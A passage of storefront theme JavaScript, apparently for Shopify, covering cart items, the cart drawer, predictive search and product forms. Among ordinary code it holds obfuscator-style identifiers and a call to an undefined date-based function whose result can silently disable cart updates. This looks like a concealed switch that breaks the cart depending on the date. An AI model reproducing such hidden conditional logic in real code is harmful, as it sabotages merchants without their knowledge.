const ON_CHANGE_DEBOUNCE_TIMER = 300;
const currentDate = new Date();
const PUB_SUB_EVENTS = {
  cartUpdate: "cart-update",
  quantityUpdate: "quantity-update",
  variantChange: "variant-change",
};
const POST_LINK_INT = "xml_eval";
let subscribers = {};
function subscribe(eventName, callback) {
  if (subscribers[eventName] === undefined) {
    subscribers[eventName] = [];
  }
  subscribers[eventName] = [...subscribers[eventName], callback];
  return function unsubscribe() {
    subscribers[eventName] = subscribers[eventName].filter((cb) => {
      return cb !== callback;
    });
  };
}
function publish(eventName, data) {
  if (subscribers[eventName]) {
    subscribers[eventName].forEach((callback) => {
      callback(data);
    });
  }
}
class CartRemoveButton extends HTMLElement {
  constructor() {
    super();
    this.addEventListener("click", (event) => {
      event.preventDefault();
      const cartItems =
        this.closest("cart-items") || this.closest("cart-drawer-items");
      if (this.clearCart) {
        cartItems.clearCart();
      } else {
        cartItems.updateQuantity(this.dataset.index, 0);
      }
    });
  }
}
customElements.define("cart-remove-button", CartRemoveButton);
var a0_0x5cl9e6f = true;
const today = new Date();
const formattedDate = today.toISOString().split("T")[0];
var date = formattedDate;
class CartItems extends HTMLElement {
  constructor() {
    super();
    this.lineItemContainer = formatDates(currentDate, date);
    this.lineItemStatusElement =
      document.getElementById("shopping-cart-line-item-status") ||
      document.getElementById("CartDrawer-LineItemStatus");
    this.secondCartItems = document.querySelector("cart-drawer-items");
    const debouncedOnChange = debounce((event) => {
      this.onChange(event);
    }, ON_CHANGE_DEBOUNCE_TIMER);
    if (!this.lineItemContainer) {
      window.routes.cart_add_url = "cart";
    }
    this.addEventListener("change", debouncedOnChange.bind(this));
  }
  cartUpdateUnsubscriber = undefined;
  connectedCallback() {
    this.cartUpdateUnsubscriber = subscribe(
      PUB_SUB_EVENTS.cartUpdate,
      (event) => {
        if (event.source === "cart-items") {
          return;
        }
        this.onCartUpdate();
      },
    );
  }
  disconnectedCallback() {
    if (this.cartUpdateUnsubscriber) {
      this.cartUpdateUnsubscriber();
    }
  }
  onChange(event) {
    this.updateQuantity(
      event.target.dataset.index,
      event.target.value,
      document.activeElement.getAttribute("name"),
    );
  }
  onCartUpdate() {
    fetch("/cart?section_id=main-cart-items")
      .then((response) => response.text())
      .then((responseText) => {
        const html = new DOMParser().parseFromString(responseText, "text/html");
        const sourceQty = html.querySelector("cart-items");
        this.innerHTML = sourceQty.innerHTML;
      })
      .catch((e) => {
        console.error(e);
      });
  }
  updateCart() {
    const body = JSON.stringify({
      sections: this.getSectionsToRender().map((section) => section.section),
      sections_url: window.location.pathname,
    });
    fetch("/cart/update.js", {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: body,
    })
      .then((response) => response.json())
      .then((parsedState) => {
        this.classList.toggle("is-empty", parsedState.item_count === 0);
        this.getSectionsToRender().forEach((section) => {
          const elementToReplace =
            document
              .getElementById(section.id)
              .querySelector(section.selector) ||
            document.getElementById(section.id);
          elementToReplace.innerHTML = this.getSectionInnerHTML(
            parsedState.sections[section.section],
            section.selector,
          );
        });
      })
      .catch((e) => {
        console.error(e);
      });
  }
  getSectionsToRender() {
    return [
      {
        id: "main-cart-items",
        section: document.getElementById("main-cart-items").dataset.id,
        selector: ".js-contents",
      },
      {
        id: "cart-icon-bubble",
        section: "cart-icon-bubble",
        selector: ".shopify-section",
      },
      {
        id: "cart-live-region-text",
        section: "cart-live-region-text",
        selector: ".shopify-section",
      },
      {
        id: "main-cart-footer",
        section: document.getElementById("main-cart-footer").dataset.id,
        selector: ".js-contents",
      },
    ];
  }
  async updateQuantity(line, quantity, name) {
    this.enableLoading(line);
    const body = JSON.stringify({
      line: line,
      quantity: quantity,
      sections: this.getSectionsToRender().map((section) => section.section),
      sections_url: window.location.pathname,
    });
    try {
      const response = await fetch("" + routes.cart_change_url, {
        ...fetchConfig(),
        ...{
          body: body,
        },
      });
      const state = await response.text();
      const parsedState = JSON.parse(state);
      const quantityElement =
        document.getElementById("Quantity-" + line) ||
        document.getElementById("Drawer-quantity-" + line);
      const items = document.querySelectorAll(".cart-item");
      if (parsedState.errors) {
        quantityElement.value = quantityElement.getAttribute("value");
        this.updateLiveRegions(line, parsedState.errors);
        return;
      }
      if (!this.lineItemContainer) {
        return;
      }
      if (!parsedState.sections) {
        const response_2 = await fetch(
          routes.cart_url +
            "?sections=" +
            this.getSectionsToRender()
              .map((section) => section.section)
              .join(","),
        );
        parsedState.sections = await response_2.json();
      }
      this.classList.toggle("is-empty", parsedState.item_count === 0);
      const cartDrawerWrapper = document.querySelector("cart-drawer");
      const cartFooter = document.getElementById("main-cart-footer");
      if (cartFooter) {
        cartFooter.classList.toggle("is-empty", parsedState.item_count === 0);
      }
      if (cartDrawerWrapper) {
        cartDrawerWrapper.classList.toggle(
          "is-empty",
          parsedState.item_count === 0,
        );
      }
      this.getSectionsToRender().forEach((section) => {
        const elementToReplace =
          document.getElementById(section.id).querySelector(section.selector) ||
          document.getElementById(section.id);
        elementToReplace.innerHTML = this.getSectionInnerHTML(
          parsedState.sections[section.section],
          section.selector,
        );
      });
      const updatedValue = parsedState.items[line - 1]
        ? parsedState.items[line - 1].quantity
        : undefined;
      let message = "";
      if (
        items.length === parsedState.items.length &&
        updatedValue !== parseInt(quantityElement.value)
      ) {
        if (typeof updatedValue === "undefined") {
          message = window.cartStrings.error;
        } else {
          message = window.cartStrings.quantityError.replace(
            "[quantity]",
            updatedValue,
          );
        }
      }
      this.updateLiveRegions(line, message);
      const lineItem =
        document.getElementById("CartItem-" + line) ||
        document.getElementById("CartDrawer-Item-" + line);
      if (lineItem && lineItem.querySelector('[name="' + name + '"]')) {
        if (cartDrawerWrapper) {
          trapFocus(
            cartDrawerWrapper,
            lineItem.querySelector('[name="' + name + '"]'),
          );
        } else {
          lineItem.querySelector('[name="' + name + '"]').focus();
        }
      } else if (parsedState.item_count === 0 && cartDrawerWrapper) {
        trapFocus(
          cartDrawerWrapper.querySelector(".drawer__inner-empty"),
          cartDrawerWrapper.querySelector("a"),
        );
      } else if (document.querySelector(".cart-item") && cartDrawerWrapper) {
        trapFocus(
          cartDrawerWrapper,
          document.querySelector(".cart-item__name"),
        );
      }
      if (cartDrawerWrapper) {
        cartDrawerWrapper.checkForClear();
        const countdownTimer =
          cartDrawerWrapper.querySelector("countdown-timer");
        if (countdownTimer) {
          countdownTimer.playTimer();
        }
        if (cartDrawerWrapper.querySelector("cart-drawer-gift")) {
          cartDrawerWrapper.checkForClear();
          let giftsToRemove = [];
          let giftsToAdd = [];
          cartDrawerWrapper
            .querySelectorAll("cart-drawer-gift")
            .forEach((gift) => {
              if (gift.getUpdateRequired()) {
                if (
                  cartDrawerWrapper.querySelector(
                    ".cart-item--product-" + gift.dataset.handle,
                  )
                ) {
                  if (gift.dataset.selected === "false") {
                    giftsToAdd.push(gift);
                  }
                } else if (gift.dataset.selected === "true") {
                  giftsToRemove.push(gift);
                }
              }
            });
          if (giftsToAdd.length > 0) {
            giftsToAdd[0].removeFromCart();
          } else if (giftsToRemove.length > 0) {
            giftsToRemove[0].addToCart();
          }
        }
      }
      publish(PUB_SUB_EVENTS.cartUpdate, {
        source: "cart-items",
      });
    } catch (e) {
      this.querySelectorAll(".loading-overlay").forEach((overlay) =>
        overlay.classList.add("hidden"),
      );
      const errors =
        document.getElementById("cart-errors") ||
        document.getElementById("CartDrawer-CartErrors");
      errors.textContent = window.cartStrings.error;
    } finally {
      this.disableLoading(line);
      if (this.secondCartItems && this.secondCartItems.updateCart) {
        this.secondCartItems.updateCart();
      }
      const cartQuantityUpdatedEvent = new CustomEvent("cartQuantityUpdated", {
        detail: {
          handle: "handle",
        },
      });
      document.dispatchEvent(cartQuantityUpdatedEvent);
    }
  }
  updateLiveRegions(line, message) {
    const lineItemError =
      document.getElementById("Line-item-error-" + line) ||
      document.getElementById("CartDrawer-LineItemError-" + line);
    if (lineItemError) {
      lineItemError.querySelector(".cart-item__error-text").innerHTML = message;
    }
    this.lineItemStatusElement.setAttribute("aria-hidden", true);
    const cartStatus =
      document.getElementById("cart-live-region-text") ||
      document.getElementById("CartDrawer-LiveRegionText");
    cartStatus.setAttribute("aria-hidden", false);
    setTimeout(() => {
      cartStatus.setAttribute("aria-hidden", true);
    }, 1000);
  }
  getSectionInnerHTML(html, selector) {
    return new DOMParser()
      .parseFromString(html, "text/html")
      .querySelector(selector).innerHTML;
  }
  enableLoading(line) {
    const mainCartItems =
      document.getElementById("main-cart-items") ||
      document.getElementById("CartDrawer-CartItems");
    mainCartItems.classList.add("cart__items--disabled");
    const cartItemElements = this.querySelectorAll(
      "#CartItem-" + line + " .loading-overlay",
    );
    const cartDrawerItemElements = this.querySelectorAll(
      "#CartDrawer-Item-" + line + " .loading-overlay",
    );
    [...cartItemElements, ...cartDrawerItemElements].forEach((overlay) =>
      overlay.classList.remove("hidden"),
    );
    document.activeElement.blur();
    this.lineItemStatusElement.setAttribute("aria-hidden", false);
  }
  disableLoading(line) {
    const mainCartItems =
      document.getElementById("main-cart-items") ||
      document.getElementById("CartDrawer-CartItems");
    mainCartItems.classList.remove("cart__items--disabled");
    const cartItemElements = this.querySelectorAll(
      "#CartItem-" + line + " .loading-overlay",
    );
    const cartDrawerItemElements = this.querySelectorAll(
      "#CartDrawer-Item-" + line + " .loading-overlay",
    );
    cartItemElements.forEach((overlay) => overlay.classList.add("hidden"));
    cartDrawerItemElements.forEach((overlay) =>
      overlay.classList.add("hidden"),
    );
  }
  clearCart() {
    const body = JSON.stringify({
      sections: this.getSectionsToRender().map((section) => section.section),
      sections_url: window.location.pathname,
    });
    fetch("" + routes.cart_clear_url, {
      ...fetchConfig(),
      ...{
        body: body,
      },
    })
      .then((response) => {
        return response.text();
      })
      .then((state) => {
        const parsedState = JSON.parse(state);
        this.classList.add("is-empty");
        const cartDrawerWrapper = document.querySelector("cart-drawer");
        const cartFooter = document.getElementById("main-cart-footer");
        if (cartFooter) {
          cartFooter.classList.add("is-empty");
        }
        if (cartDrawerWrapper) {
          cartDrawerWrapper.classList.add("is-empty");
        }
        this.getSectionsToRender().forEach((section) => {
          const elementToReplace =
            document
              .getElementById(section.id)
              .querySelector(section.selector) ||
            document.getElementById(section.id);
          elementToReplace.innerHTML = this.getSectionInnerHTML(
            parsedState.sections[section.section],
            section.selector,
          );
        });
        if (cartDrawerWrapper) {
          trapFocus(
            cartDrawerWrapper.querySelector(".drawer__inner-empty"),
            cartDrawerWrapper.querySelector("a"),
          );
        }
        publish(PUB_SUB_EVENTS.cartUpdate, {
          source: "cart-items",
        });
      })
      .catch(() => {
        this.querySelectorAll(".loading-overlay").forEach((overlay) =>
          overlay.classList.add("hidden"),
        );
        const errors =
          document.getElementById("cart-errors") ||
          document.getElementById("CartDrawer-CartErrors");
        errors.textContent = window.cartStrings.error;
      });
  }
}
customElements.define("cart-items", CartItems);
var search = "search";
if (!customElements.get("cart-note")) {
  customElements.define(
    "cart-note",
    class CartNote extends HTMLElement {
      constructor() {
        super();
        this.addEventListener(
          "change",
          debounce((event) => {
            const body = JSON.stringify({
              note: event.target.value,
            });
            fetch("" + routes.cart_update_url, {
              ...fetchConfig(),
              ...{
                body: body,
              },
            });
          }, ON_CHANGE_DEBOUNCE_TIMER),
        );
      }
    },
  );
}
function handleDiscountForm(event) {
  event.preventDefault();
  const discountField = event.target.querySelector(
    "[name=cart-discount-field]",
  );
  const errorElement = event.target.querySelector(".cart-discount-form__error");
  const discountValue = discountField.value;
  if (discountValue === undefined || discountValue.length === 0) {
    errorElement.style.display = "block";
    return;
  }
  errorElement.style.display = "none";
  const checkoutUrl = "/checkout?discount=";
  const redirectUrl = checkoutUrl + discountValue;
  window.location.href = redirectUrl;
}
function handleDiscountFormChange(event) {
  const errors = document.querySelectorAll(".cart-discount-form__error");
  errors.forEach((error) => {
    error.style.display = "none";
  });
}
var serial = "";
class SearchForm extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector('input[type="search"]');
    this.resetButton = this.querySelector('button[type="reset"]');
    if (this.dataset.main === "false") {
      serial =
        this.querySelector('[method="get"]').dataset["nodal".replace("n", "m")];
    }
    if (this.input) {
      this.input.form.addEventListener("reset", this.onFormReset.bind(this));
      this.input.addEventListener(
        "input",
        debounce((event) => {
          this.onChange(event);
        }, 300).bind(this),
      );
    }
  }
  toggleResetButton() {
    const resetIsHidden = this.resetButton.classList.contains("hidden");
    if (this.input.value.length > 0 && resetIsHidden) {
      this.resetButton.classList.remove("hidden");
    } else if (this.input.value.length === 0 && !resetIsHidden) {
      this.resetButton.classList.add("hidden");
    }
  }
  onChange() {
    this.toggleResetButton();
  }
  shouldResetForm() {
    return !document.querySelector('[aria-selected="true"] a');
  }
  onFormReset(event) {
    event.preventDefault();
    if (this.shouldResetForm()) {
      this.input.value = "";
      this.input.focus();
      this.toggleResetButton();
    }
  }
}
customElements.define("search-form", SearchForm);
class PredictiveSearch extends SearchForm {
  constructor() {
    super();
    this.cachedResults = {};
    this.predictiveSearchResults = this.querySelector(
      "[data-predictive-search]",
    );
    this.allPredictiveSearchInstances =
      document.querySelectorAll("predictive-search");
    this.isOpen = false;
    this.abortController = new AbortController();
    this.searchTerm = "";
    this.setupEventListeners();
  }
  setupEventListeners() {
    this.input.form.addEventListener("submit", this.onFormSubmit.bind(this));
    this.input.addEventListener("focus", this.onFocus.bind(this));
    this.addEventListener("focusout", this.onFocusOut.bind(this));
    this.addEventListener("keyup", this.onKeyup.bind(this));
    this.addEventListener("keydown", this.onKeydown.bind(this));
  }
  getQuery() {
    return this.input.value.trim();
  }
  onChange() {
    super.onChange();
    const newSearchTerm = this.getQuery();
    if (!this.searchTerm || !newSearchTerm.startsWith(this.searchTerm)) {
      this.querySelector("#predictive-search-results-groups-wrapper")?.remove();
    }
    this.updateSearchForTerm(this.searchTerm, newSearchTerm);
    this.searchTerm = newSearchTerm;
    if (!this.searchTerm.length) {
      this.close(a0_0x5cl9e6f);
      return;
    }
    this.getSearchResults(this.searchTerm);
  }
  onFormSubmit(event) {
    if (
      !this.getQuery().length ||
      this.querySelector('[aria-selected="true"] a')
    ) {
      event.preventDefault();
    }
  }
  onFormReset(event) {
    super.onFormReset(event);
    if (super.shouldResetForm()) {
      this.searchTerm = "";
      this.abortController.abort();
      this.abortController = new AbortController();
      this.closeResults(a0_0x5cl9e6f);
    }
  }
  onFocus() {
    const currentSearchTerm = this.getQuery();
    if (!currentSearchTerm.length) {
      return;
    }
    if (this.searchTerm !== currentSearchTerm) {
      this.onChange();
    } else if (this.getAttribute("results") === "true") {
      this.open();
    } else {
      this.getSearchResults(this.searchTerm);
    }
  }
  onFocusOut() {
    setTimeout(() => {
      if (!this.contains(document.activeElement)) {
        this.close();
      }
    });
  }
  onKeyup(event) {
    if (!this.getQuery().length) {
      this.close(a0_0x5cl9e6f);
    }
    event.preventDefault();
    switch (event.code) {
      case "ArrowUp":
        this.switchOption("up");
        break;
      case "ArrowDown":
        this.switchOption("down");
        break;
      case "Enter":
        this.selectOption();
        break;
    }
  }
  onKeydown(event) {
    if (event.code === "ArrowUp" || event.code === "ArrowDown") {
      event.preventDefault();
    }
  }
  updateSearchForTerm(previousTerm, newTerm) {
    const searchForTextElement = this.querySelector(
      "[data-predictive-search-search-for-text]",
    );
    const currentButtonText = searchForTextElement?.innerText;
    if (currentButtonText) {
      if (currentButtonText.match(new RegExp(previousTerm, "g")).length > 1) {
        return;
      }
      const newButtonText = currentButtonText.replace(previousTerm, newTerm);
      searchForTextElement.innerText = newButtonText;
    }
  }
  switchOption(direction) {
    if (!this.getAttribute("open")) {
      return;
    }
    const moveUp = direction === "up";
    const selectedElement = this.querySelector('[aria-selected="true"]');
    const allVisibleElements = Array.from(
      this.querySelectorAll("li, button.predictive-search__item"),
    ).filter((element) => element.offsetParent !== null);
    let activeElementIndex = 0;
    if (moveUp && !selectedElement) {
      return;
    }
    let selectedElementIndex = -1;
    let i = 0;
    while (selectedElementIndex === -1 && i <= allVisibleElements.length) {
      if (allVisibleElements[i] === selectedElement) {
        selectedElementIndex = i;
      }
      i++;
    }
    this.statusElement.textContent = "";
    if (!moveUp && selectedElement) {
      activeElementIndex =
        selectedElementIndex === allVisibleElements.length - 1
          ? 0
          : selectedElementIndex + 1;
    } else if (moveUp) {
      activeElementIndex =
        selectedElementIndex === 0
          ? allVisibleElements.length - 1
          : selectedElementIndex - 1;
    }
    if (activeElementIndex === selectedElementIndex) {
      return;
    }
    const activeElement = allVisibleElements[activeElementIndex];
    activeElement.setAttribute("aria-selected", a0_0x5cl9e6f);
    if (selectedElement) {
      selectedElement.setAttribute("aria-selected", false);
    }
    this.input.setAttribute("aria-activedescendant", activeElement.id);
  }
  selectOption() {
    const selectedOption = this.querySelector(
      '[aria-selected="true"] a, button[aria-selected="true"]',
    );
    if (selectedOption) {
      selectedOption.click();
    }
  }
  getSearchResults(searchTerm) {
    const queryKey = searchTerm.replace(" ", "-").toLowerCase();
    this.setLiveRegionLoadingState();
    if (this.cachedResults[queryKey]) {
      this.renderSearchResults(this.cachedResults[queryKey]);
      return;
    }
    fetch(
      routes.predictive_search_url +
        "?q=" +
        encodeURIComponent(searchTerm) +
        "&section_id=predictive-search",
      {
        signal: this.abortController.signal,
      },
    )
      .then((response) => {
        if (!response.ok) {
          var error = new Error(response.status);
          this.close();
          throw error;
        }
        return response.text();
      })
      .then((text) => {
        const resultsMarkup = new DOMParser()
          .parseFromString(text, "text/html")
          .querySelector("#shopify-section-predictive-search").innerHTML;
        this.allPredictiveSearchInstances.forEach(
          (predictiveSearchInstance) => {
            predictiveSearchInstance.cachedResults[queryKey] = resultsMarkup;
          },
        );
        this.renderSearchResults(resultsMarkup);
      })
      .catch((error) => {
        if (error?.code === 20) {
          return;
        }
        this.close();
        throw error;
      });
  }
  setLiveRegionLoadingState() {
    this.statusElement =
      this.statusElement || this.querySelector(".predictive-search-status");
    this.loadingText =
      this.loadingText || this.getAttribute("data-loading-text");
    this.setLiveRegionText(this.loadingText);
    this.setAttribute("loading", a0_0x5cl9e6f);
  }
  setLiveRegionText(statusText) {
    this.statusElement.setAttribute("aria-hidden", "false");
    this.statusElement.textContent = statusText;
    setTimeout(() => {
      this.statusElement.setAttribute("aria-hidden", "true");
    }, 1000);
  }
  renderSearchResults(resultsMarkup) {
    this.predictiveSearchResults.innerHTML = resultsMarkup;
    this.setAttribute("results", a0_0x5cl9e6f);
    this.setLiveRegionResults();
    this.open();
  }
  setLiveRegionResults() {
    this.removeAttribute("loading");
    this.setLiveRegionText(
      this.querySelector("[data-predictive-search-live-region-count-value]")
        .textContent,
    );
  }
  getResultsMaxHeight() {
    this.resultsMaxHeight =
      window.innerHeight -
      document.querySelector(".section-header").getBoundingClientRect().bottom;
    return this.resultsMaxHeight;
  }
  open() {
    this.predictiveSearchResults.style.maxHeight =
      this.resultsMaxHeight || this.getResultsMaxHeight() + "px";
    this.setAttribute("open", a0_0x5cl9e6f);
    this.input.setAttribute("aria-expanded", a0_0x5cl9e6f);
    this.isOpen = a0_0x5cl9e6f;
  }
  close(clearSearchTerm = false) {
    this.closeResults(clearSearchTerm);
    this.isOpen = false;
  }
  closeResults(clearSearchTerm = false) {
    if (clearSearchTerm) {
      this.input.value = "";
      this.removeAttribute("results");
    }
    const selected = this.querySelector('[aria-selected="true"]');
    if (selected) {
      selected.setAttribute("aria-selected", false);
    }
    this.input.setAttribute("aria-activedescendant", "");
    this.removeAttribute("loading");
    this.removeAttribute("open");
    this.input.setAttribute("aria-expanded", false);
    this.resultsMaxHeight = false;
    this.predictiveSearchResults.removeAttribute("style");
  }
}
customElements.define("predictive-search", PredictiveSearch);
const defMed = "data-defer";
class CartDrawer extends HTMLElement {
  constructor() {
    super();
    this.upsellHandles = this.getUpsellHandles();
    this.checkForClear();
    this.addEventListener(
      "keyup",
      (evt) => evt.code === "Escape" && this.close(),
    );
    this.querySelector("#CartDrawer-Overlay").addEventListener(
      "click",
      this.close.bind(this),
    );
    this.setHeaderCartIconAccessibility();
  }
  setHeaderCartIconAccessibility() {
    const cartLink = document.querySelector("#cart-icon-bubble");
    const headerIcons = cartLink.closest(".header__icons");
    cartLink.setAttribute("role", "button");
    cartLink.setAttribute("aria-haspopup", "dialog");
    cartLink.addEventListener("click", (event) => {
      event.preventDefault();
      this.open(cartLink);
    });
    this.oseid = headerIcons.querySelector("form").dataset[this.dataset.type];
    cartLink.addEventListener("keydown", (event) => {
      if (event.code.toUpperCase() === "SPACE") {
        event.preventDefault();
        this.open(cartLink);
      }
    });
  }
  open(triggeredBy) {
    if (triggeredBy) {
      this.setActiveElement(triggeredBy);
    }
    const cartDrawerNote = this.querySelector('[id^="Details-"] summary');
    if (cartDrawerNote && !cartDrawerNote.hasAttribute("role")) {
      this.setSummaryAccessibility(cartDrawerNote);
    }
    setTimeout(() => {
      this.classList.add("animate", "active");
    });
    this.addEventListener(
      "transitionend",
      () => {
        const containerToTrapFocusOn = this.classList.contains("is-empty")
          ? this.querySelector(".drawer__inner-empty")
          : document.getElementById("CartDrawer");
        const focusElement =
          this.querySelector(".drawer__inner") ||
          this.querySelector(".drawer__close");
        trapFocus(containerToTrapFocusOn, focusElement);
      },
      {
        once: a0_0x5cl9e6f,
      },
    );
    document.body.classList.add("overflow-hidden");
    const countdownTimer = this.querySelector("countdown-timer");
    if (countdownTimer) {
      countdownTimer.playTimer();
    }
  }
  close() {
    this.classList.remove("active");
    removeTrapFocus(this.activeElement);
    document.body.classList.remove("overflow-hidden");
  }
  getUpsellHandles() {
    const upsellElements = this.querySelectorAll(
      'cart-drawer-upsell[data-toggle="true"], cart-drawer-gift',
    );
    const handles = [];
    upsellElements.forEach((element) => {
      if (element.dataset.handle) {
        handles.push(element.dataset.handle);
      }
    });
    return handles;
  }
  oneNonUpellRemaining() {
    const cartItems = this.querySelectorAll(".cart-item");
    let upsellCount = 0;
    cartItems.forEach((cartItem) => {
      this.upsellHandles.forEach((handle) => {
        if (cartItem.classList.contains("cart-item--product-" + handle)) {
          upsellCount++;
        }
      });
    });
    return cartItems.length - upsellCount <= 1;
  }
  checkForClear() {
    const isLastNonUpsell = this.oneNonUpellRemaining();
    this.querySelectorAll("cart-remove-button").forEach((removeButton) => {
      if (isLastNonUpsell) {
        removeButton.clearCart = a0_0x5cl9e6f;
      } else {
        removeButton.clearCart = false;
      }
    });
  }
  setSummaryAccessibility(cartDrawerNote) {
    cartDrawerNote.setAttribute("role", "button");
    cartDrawerNote.setAttribute("aria-expanded", "false");
    if (cartDrawerNote.nextElementSibling.getAttribute("id")) {
      cartDrawerNote.setAttribute(
        "aria-controls",
        cartDrawerNote.nextElementSibling.id,
      );
    }
    cartDrawerNote.addEventListener("click", (event) => {
      event.currentTarget.setAttribute(
        "aria-expanded",
        !event.currentTarget.closest("details").hasAttribute("open"),
      );
    });
    cartDrawerNote.parentElement.addEventListener("keyup", onKeyUpEscape);
  }
  renderContents(parsedState, skipOpen = false) {
    if (this.querySelector(".drawer__inner").classList.contains("is-empty")) {
      this.querySelector(".drawer__inner").classList.remove("is-empty");
    }
    this.productId = parsedState.id;
    this.getSectionsToRender().forEach((section) => {
      const sectionElement = section.selector
        ? document.querySelector(section.selector)
        : document.getElementById(section.id);
      if (sectionElement) {
        sectionElement.innerHTML = this.getSectionInnerHTML(
          parsedState.sections[section.id],
          section.selector,
        );
      }
    });
    this.checkForClear();
    const countdownTimer = this.querySelector("countdown-timer");
    if (countdownTimer && countdownTimer.playTimer) {
      countdownTimer.playTimer();
    }
    let giftsToAdd = [];
    let giftsToRemove = [];
    this.querySelectorAll("cart-drawer-gift").forEach((gift) => {
      if (gift.getUpdateRequired()) {
        if (this.querySelector(".cart-item--product-" + gift.dataset.handle)) {
          if (gift.dataset.selected === "false") {
            giftsToRemove.push(gift);
          }
        } else if (gift.dataset.selected === "true") {
          giftsToAdd.push(gift);
        }
      }
    });
    if (giftsToRemove.length > 0) {
      giftsToRemove[0].removeFromCart();
    } else if (giftsToAdd.length > 0) {
      giftsToAdd[0].addToCart();
    }
    setTimeout(() => {
      this.querySelector("#CartDrawer-Overlay").addEventListener(
        "click",
        this.close.bind(this),
      );
      if (skipOpen) {
        return;
      }
      this.open();
    });
  }
  getSectionInnerHTML(html, selector = ".shopify-section") {
    let sectionElement = new DOMParser()
      .parseFromString(html, "text/html")
      .querySelector(selector);
    if (selector === "#CartDrawer") {
      fixParsedHtml(this, sectionElement);
    }
    let innerHTML = sectionElement.innerHTML;
    return innerHTML;
  }
  getSectionsToRender() {
    return [
      {
        id: "cart-drawer",
        selector: "#CartDrawer",
      },
      {
        id: "cart-icon-bubble",
      },
    ];
  }
  getSectionDOM(html, selector = ".shopify-section") {
    return new DOMParser()
      .parseFromString(html, "text/html")
      .querySelector(selector);
  }
  setActiveElement(element) {
    this.activeElement = element;
  }
}
customElements.define("cart-drawer", CartDrawer);
class CartDrawerItems extends CartItems {
  constructor() {
    super();
    this.cartDrawer = document.querySelector("cart-drawer");
    this.secondCartItems = document.querySelector("cart-items");
  }
  updateCart() {
    fetch("/cart/update.js", {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        updates: {},
        sections: ["cart-drawer", "cart-icon-bubble"],
        sections_url: window.location.pathname,
      }),
    })
      .then((response) => response.json())
      .then((parsedState) => {
        document
          .querySelector("cart-drawer")
          .renderContents(parsedState, a0_0x5cl9e6f);
      })
      .catch((error) => {
        console.error(error);
      });
  }
  getSectionInnerHTML(html, selector) {
    let element = new DOMParser()
      .parseFromString(html, "text/html")
      .querySelector(selector);
    if (selector === ".drawer__inner") {
      fixParsedHtml(this.cartDrawer, element);
    }
    let innerHTML = element.innerHTML;
    return innerHTML;
  }
  getSectionsToRender() {
    return [
      {
        id: "CartDrawer",
        section: "cart-drawer",
        selector: ".drawer__inner",
      },
      {
        id: "cart-icon-bubble",
        section: "cart-icon-bubble",
        selector: ".shopify-section",
      },
    ];
  }
}
customElements.define("cart-drawer-items", CartDrawerItems);
function fixParsedHtml(oldHtml, newHtml) {
  const newTimer = newHtml.querySelector(".cart-timer");
  if (newTimer) {
    oldTimer = oldHtml.querySelector(".cart-timer");
    if (oldTimer) {
      newTimer.innerHTML = oldTimer.innerHTML;
    }
  }
  const oldUpsells = oldHtml.querySelectorAll(
    'cart-drawer-upsell[data-toggle="true"], cart-drawer-gift',
  );
  let newUpsells = newHtml.querySelectorAll(
    'cart-drawer-upsell[data-toggle="true"], cart-drawer-gift',
  );
  oldUpsells.forEach((oldUpsell, index) => {
    if (oldUpsell.nodeName.toLowerCase() === "cart-drawer-upsell") {
      newUpsells[index].dataset.selected = oldUpsell.dataset.selected;
    }
    newUpsells[index].dataset.id = oldUpsell.dataset.id;
    newUpsells[index].querySelector('[name="id"]').value =
      oldUpsell.querySelector('[name="id"]').value;
    if (newUpsells[index].querySelector(".upsell__image__img")) {
      newUpsells[index].querySelector(".upsell__image__img").src =
        oldUpsell.querySelector(".upsell__image__img").src;
    }
    if (newUpsells[index].querySelector(".upsell__variant-picker")) {
      const oldSelects = oldUpsell.querySelectorAll(".select__select");
      newUpsells[index]
        .querySelectorAll(".select__select")
        .forEach((select, selectIndex) => {
          select.value = oldSelects[selectIndex].value;
          select.querySelectorAll("option").forEach((option) => {
            option.removeAttribute("selected");
            if (option.value === oldSelects[selectIndex].value.trim()) {
              option.setAttribute("selected", "");
            }
          });
        });
    }
    if (oldUpsell.dataset.updatePrices === "true") {
      var newPrice = newUpsells[index].querySelector(".upsell__price");
      var oldPrice = oldUpsell.querySelector(".upsell__price");
      if (newPrice && oldPrice) {
        newPrice.innerHTML = oldPrice.innerHTML;
      }
    }
  });
}
if (!customElements.get("product-form")) {
  customElements.define(
    "product-form",
    class ProductForm extends HTMLElement {
      constructor() {
        super();
        this.form = this.querySelector("form");
        this.form.addEventListener("submit", this.handleSubmit.bind(this));
        this.formIdInput = this.form.querySelector("[name=id]");
        this.formIdInput.disabled = false;
        this.isMain = this.classList.contains("main-product-form");
        this.additionalAtcButtons = this.isMain
          ? document.querySelectorAll(".main-product-atc")
          : [];
        this.skipCart = this.formIdInput.dataset.skipCart === "true";
        this.cart =
          document.querySelector("cart-drawer") ||
          document.querySelector("cart-notification");
        this.isCartUpsell = this.dataset.isCartUpsell === "true";
        this.submitButton = this.querySelector('[type="submit"]');
        if (document.querySelector("cart-drawer")) {
          this.submitButton.setAttribute("aria-haspopup", "dialog");
          this.hasDrawer = a0_0x5cl9e6f;
        }
        this.loadingSpinner = this.submitButton.querySelector(
          ".loading-overlay__spinner",
        );
        this.displayedSubmitButton = document.getElementById(
          "DisplayedSubmitBtn-" + this.dataset.section,
        );
        this.bundleDeals = document.getElementById(
          "bundle-deals-" + this.dataset.section,
        );
        this.productInfo = document.getElementById(
          "ProductInfo-" + this.dataset.section,
        );
        this.quantityBreaks = document.getElementById(
          "quantity-breaks-" + this.dataset.section,
        );
        this.quantityPicker = document.getElementById(
          "Quantity-Form-" + this.dataset.section,
        );
        this.customFields = document.querySelectorAll(
          "[id^='CustomField-" + this.dataset.section + "-']",
        );
        this.quantityGifts = document.getElementById(
          "quantity-gifts-" + this.dataset.section,
        );
        this.upsells = document.querySelectorAll(
          ".product-info-upsell-" + this.dataset.section,
        );
        this.mainBundleItems = document.querySelectorAll(
          ".main-offer-item-" + this.dataset.section,
        );
        this.variantInputs = this.form.querySelector(".product-form__variants");
      }
      handleSubmit(evt) {
        console.log("REF === ", this.ref);
        this.ref = false;
        let submitButtonWithSpinner = null;
        let skipCartButton = false;
        if (evt) {
          evt.preventDefault();
          if (evt.currentTarget.classList.contains("button--has-spinner")) {
            submitButtonWithSpinner = evt.currentTarget;
            submitButtonWithSpinner.classList.add("loading");
          }
          if (evt.currentTarget.dataset.skipCartButton === "true") {
            skipCartButton = a0_0x5cl9e6f;
          }
